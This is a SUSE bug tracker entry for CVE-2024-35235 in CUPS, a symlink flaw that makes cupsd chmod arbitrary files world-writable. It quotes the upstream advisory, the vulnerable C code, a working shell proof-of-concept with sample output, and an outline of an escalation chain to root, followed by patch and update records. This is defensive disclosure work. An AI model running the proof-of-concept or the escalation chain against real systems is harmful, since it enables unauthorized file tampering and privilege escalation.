Bug 1225365 (CVE-2024-35235) - VUL-0: CVE-2024-35235: cups: Listen port arbitrary chmod 0140777
Summary: VUL-0: CVE-2024-35235: cups: Listen port arbitrary chmod 0140777
Status: IN_PROGRESS
Alias: CVE-2024-35235
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Importance: P3 - Medium : Major
Target Milestone: ---
Assignee: Johannes Meixner
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/407859/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-35235:7.8:(AV:...
Keywords:
Depends on:
Blocks:
 
Reported: 2024-05-27 14:33 UTC by SMASH SMASH
Modified: 2024-07-25 04:56 UTC

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
jsmeix: needinfo? (security-team)


Description SMASH SMASH 2024-05-27 14:33:09 UTC
CRD: 2024-06-06

https://github.com/OpenPrinting/cups/security/advisories/GHSA-vvwp-mv6j-hw6f

================================================================
Cupsd Listen arbitrary chmod 0140777


Summary

When starting the cupsd server with a Listen configuration
item pointing to a symbolic link, the cupsd process can be
caused to perform an arbitrary chmod of the provided
argument, providing world-writable access to the target.


Details

This is an excerpt from a larger chain of vulnerabilities
reported in Ubuntu 24.04. There is an assumption for
exploitation that /etc/cups/cupsd.conf can be successfully
edited (this has been omitted here as it is believed
to be out of scope).

When setting up the bind for unix sockets configured
in the Listen parameters of the configuration file,
the code does not check for a successful call
to unlink and bind prior to performing the
call to chmod. [1]

On Ubuntu 24.04, by setting the Listen argument
to a path such as /tmp/stage/file, where file
is a symlink elsewhere in the system, the previous
call to unlink for the path will fail due
to AppArmor [2], and the subsequent call to bind
will also fail due to the file still existing.
The return value of the call to bind is not checked
before the call to chmod, so a successfully planted
symbolic link which causes the bind to fail will
still be traversed by the call to chmod and the
file permissions changed to be world writable.

On systems where the Ubuntu AppArmor policy is
not in place, this vulnerability still exists
but as a race condition between the call
to unlink and the call to bind. A sufficiently
fast attacker could place a symbolic link at
the configured location after the call to unlink,
causing the bind to fail once again and performing
a successful chmod.


[1]
cups/cups/http-addr.c
Lines 229 to 240 in aba9170
-----------------------------------------------------
  unlink(addr->un.sun_path);

  // Save the current umask and set it to 0 so that all users can access
  // the domain socket...
  mask = umask(0);

  // Bind the domain socket...
  status = bind(fd, (struct sockaddr *)addr, (socklen_t)httpAddrLength(addr));

  // Restore the umask and fix permissions...
  umask(mask);
  chmod(addr->un.sun_path, 0140777);
-----------------------------------------------------


[2] 
https://git.launchpad.net/ubuntu/+source/apparmor/tree/profiles/apparmor.d/abstractions/user-tmp#n21


PoC

The following script can be used for exploitation,
sudo is used to emulate the above mentioned
Listen configuration access.
-----------------------------------------------------
set -e
exploit() {
         echo "Staging..."
         mkdir -m 777 /tmp/stage
         ln -s /etc/cups/cupsd.conf /tmp/stage/cupsd.conf

         # emulate configuration access to cupsd.conf
         echo 'Listen /tmp/stage/cupsd.conf' | sudo tee -a /etc/cups/cupsd.conf

         echo

         echo "Current permissions of cupsd.conf"
         ls -l /etc/cups/cupsd.conf
         tail -n1 /etc/cups/cupsd.conf || true

         echo

         echo "Restarting cupsd"
         sudo systemctl restart cups

         echo

         echo "New permissions of cupsd.conf"
         ls -l /etc/cups/cupsd.conf
         tail -n1 /etc/cups/cupsd.conf || true
}

cleanup() {
         sudo sed -i '/Listen \/tmp\/stage\/cupsd.conf/d' /etc/cups/cupsd.conf
         sudo chmod 640 /etc/cups/cupsd.conf
         rm -rf /tmp/stage
}

"$@"
-----------------------------------------------------

Sample output can be seen below:
-----------------------------------------------------
$ sh poc.sh exploit
Staging...
Listen /tmp/stage/cupsd.conf

Current permissions of cupsd.conf
-rw-r----- 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf
tail: cannot open '/etc/cups/cupsd.conf' for reading: Permission denied

Restarting cupsd

New permissions of cupsd.conf
-rwxrwxrwx 1 root lp 4987 May 24 10:18 /etc/cups/cupsd.conf
Listen /tmp/stage/cupsd.conf
$ sh poc.sh cleanup
-----------------------------------------------------


Impact

Given that cupsd is often running as root, this can
result in the change of permission of any user or
system files to be world writable.

Given the aforementioned Ubuntu AppArmor context,
on such systems this vulnerability is limited to those
files modifiable by the cupsd process. In that specific
case it was found to be possible to turn the
configuration of the Listen argument into full
control over the cupsd.conf and cups-files.conf
configuration files. By later setting the User
and Group arguments in cups-files.conf, and
printing with a printer configured by PPD with
a FoomaticRIPCommandLine argument, arbitrary
user and group (not root) command execution
could be achieved, which can further be used
on Ubuntu systems to achieve full root command
execution.

================================================================

GitHub has issued CVE-2024-35235 for this Security Advisory
after reviewing it for compliance with CVE rules.
Once you've published your Security Advisory, we'll publish
the CVE to the CVE List https://cve.mitre.org/cve/

================================================================


The currently proposed dates and time are:

Today or tomorrow send announcement to distros list.

Public disclosure next week June 06
Comment 3 Marcus Meissner 2024-05-28 11:44:28 UTC
CRD: 2024-06-11 14:00UTC
Comment 13 Marcus Meissner 2024-06-11 14:16:46 UTC
is public now

there is a vulnerability CVE-2024-35235 in the cups project:


    Description


      Summary

When starting the cupsd server with a Listen configuration item pointing 
to a symbolic link, the cupsd process can be caused to perform an 
arbitrary chmod of the provided argument, providing world-writable 
access to the target.


      Details

This is an excerpt from a larger chain of vulnerabilities reported in 
Ubuntu 24.04. There is an assumption for exploitation that 
/etc/cups/cupsd.conf can be successfully edited (this has been omitted 
here as it is believed to be out of scope).

When setting up the bind for unix sockets configured in the Listen 
parameters of the configuration file, the code does not check for a 
successful call to |unlink| and |bind| prior to performing the call to 
|chmod|. [1]

On Ubuntu 24.04, by setting the Listen argument to a path such as 
|/tmp/stage/file|, where |file| is a symlink elsewhere in the system, 
the previous call to |unlink| for the path will fail due to AppArmor 
[2], and the subsequent call to |bind| will also fail due to the file 
still existing. The return value of the call to |bind| is not checked 
before the call to |chmod|, so a successfully planted symbolic link 
which causes the |bind| to fail will still be traversed by the call to 
|chmod| and the file permissions changed to be world writable.

On systems where the Ubuntu AppArmor policy is not in place, this 
vulnerability still exists but as a race condition between the call to 
|unlink| and the call to |bind|. A sufficiently fast attacker could 
place a symbolic link at the configured location after the call to 
|unlink|, causing the |bind| to fail once again and performing a 
successful |chmod|.

      Severity: Moderate - CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
....
Comment 15 Johannes Meixner 2024-06-11 14:30:45 UTC
Fixed for openSUSE Factory / Tumbleweed:
-------------------------------------------------------
# osc submitrequest \
 -m 'Fix for CVE-2024-35235 bsc#1225365' \
 home:jsmeix:branches:Printing cups Printing cups
created request id 1180031

# osc request accept \
 -m 'Fix for CVE-2024-35235 bsc#1225365' 1180031
Result of change request state: ok
...
openSUSE:Factory 
Forward this submit to it? ([y]/n)y
The following submit request is already open: 1179938.
Supersede the old request? (y/n/c) y
Fix for CVE-2024-35235 bsc#1225365
 (forwarded request 1180031 from jsmeix)
New request # 1180032
-------------------------------------------------------
Comment 16 OBSbugzilla Bot 2024-06-11 15:05:03 UTC
This is an autogenerated message for OBS integration:
This bug (1225365) was mentioned in
https://build.opensuse.org/request/show/1180032 Factory / cups
Comment 17 Maintenance Automation 2024-06-12 08:30:04 UTC
SUSE-SU-2024:2003-1: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1223179, 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/)
Sources used:
openSUSE Leap Micro 5.3 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap Micro 5.4 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap 15.5 (src):
 cups-2.2.7-150000.3.59.1
openSUSE Leap 15.6 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.5 (src):
 cups-2.2.7-150000.3.59.1
Basesystem Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Basesystem Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
Desktop Applications Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Desktop Applications Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
Development Tools Module 15-SP5 (src):
 cups-2.2.7-150000.3.59.1
Development Tools Module 15-SP6 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Desktop 15 SP4 LTSS 15-SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server 15 SP4 LTSS 15-SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Server for SAP Applications 15 SP4 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Proxy 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Retail Branch Server 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Manager Server 4.3 (src):
 cups-2.2.7-150000.3.59.1
SUSE Enterprise Storage 7.1 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro 5.2 (src):
 cups-2.2.7-150000.3.59.1
SUSE Linux Enterprise Micro for Rancher 5.2 (src):
 cups-2.2.7-150000.3.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 18 Maintenance Automation 2024-06-12 08:30:08 UTC
SUSE-SU-2024:2002-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34177](https://smelt.suse.de/incident/34177/)
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise Server 12 SP5 (src):
 cups-1.7.5-20.49.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src):
 cups-1.7.5-20.49.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Maintenance Automation 2024-07-12 16:30:51 UTC
SUSE-SU-2024:2003-2: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1223179, 1225365
CVE References: CVE-2024-35235
Maintenance Incident: [SUSE:Maintenance:34073](https://smelt.suse.de/incident/34073/)
Sources used:
SUSE Linux Enterprise Micro 5.5 (src):
 cups-2.2.7-150000.3.59.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.